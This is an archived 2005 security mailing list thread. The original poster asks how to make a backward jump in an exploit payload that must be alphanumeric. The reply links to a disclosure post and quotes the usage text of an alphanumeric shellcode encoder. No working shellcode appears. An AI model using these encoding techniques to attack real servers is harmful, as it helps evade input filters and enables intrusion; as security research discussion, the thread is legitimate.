Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: AlphaNumeric Exploitation Help

From: <6d79676d61696c6163636f756e74 () gmail com>
Date: 26 May 2005 20:16:28 -0000
In-Reply-To: <20050526113825.537.qmail () www securityfocus com>

read this:
http://lists.grok.org.uk/pipermail/full-disclosure/2004-October/027147.html
=======================
void Encode2AlnumUsage()
{
        fprintf(stderr, ENC2ALNUM_COPYRIGHT);
        fprintf(stderr, "ERROR in Encode2Alnum (invalid input_reg)\n\n");
        fprintf(stderr, "input_reg must be one of the following:\n");
        fprintf(stderr, " reg = the register points to the shellcode\n");
        fprintf(stderr, "\tSupported registers are eax, ebx, ecx, edx, esi, edi, 
ebp, esp\n");
        fprintf(stderr, " [reg] = reg points to a pointer to the shellcode\n");
        fprintf(stderr, "\tSupported registers are the same as above\n");
        fprintf(stderr, " reg+X\n");
        fprintf(stderr, " reg-x\n");
        fprintf(stderr, " [reg+X]\n");
        fprintf(stderr, " [reg-x]\n\n\n");
        fprintf(stderr, "\tenc2alnum [eax]\n");
        fprintf(stderr, "Example - Assumes ecx-8 is the shellcode address:\n");
        fprintf(stderr, "\tenc2alnum ecx-8\n");
}
================


Received: (qmail 5525 invoked from network); 26 May 2005 16:49:47 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
 by mail.securityfocus.com with SMTP; 26 May 2005 16:49:47 -0000
Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
      by outgoing3.securityfocus.com (Postfix) with QMQP
      id D106D237227; Thu, 26 May 2005 09:20:01 -0600 (MDT)
Mailing-List: contact vuln-dev-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <vuln-dev.list-id.securityfocus.com>
List-Post: <mailto:vuln-dev () securityfocus com>
List-Help: <mailto:vuln-dev-help () securityfocus com>
List-Unsubscribe: <mailto:vuln-dev-unsubscribe () securityfocus com>
List-Subscribe: <mailto:vuln-dev-subscribe () securityfocus com>
Delivered-To: mailing list vuln-dev () securityfocus com
Delivered-To: moderator for vuln-dev () securityfocus com
Received: (qmail 18063 invoked from network); 26 May 2005 12:07:45 -0000
Date: 26 May 2005 11:38:25 -0000
Message-ID: <20050526113825.537.qmail () www securityfocus com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: <ramatkal () hotmail com>
To: vuln-dev () securityfocus com
Subject: AlphaNumeric Exploitation Help



I am trying to exploit a vulnerable server which only allows
alphanumeric characters....

I have successfully taken control of EIP and now need to do a JUMP -600
bytes.....

The problem is, that 'eb' and 'e9' are not alphanumeric asci codes and 
thus cannot be used to do the jumps in the payload....

Anyone got any ideas/tricks/advice on how i can accomplish a JMP -600 bytes, or any type of jump for that matter, only 
using alphanumeric chars?

Thanks,
RaMatkal
Previous By Date Next
Previous By Thread Next

Current thread: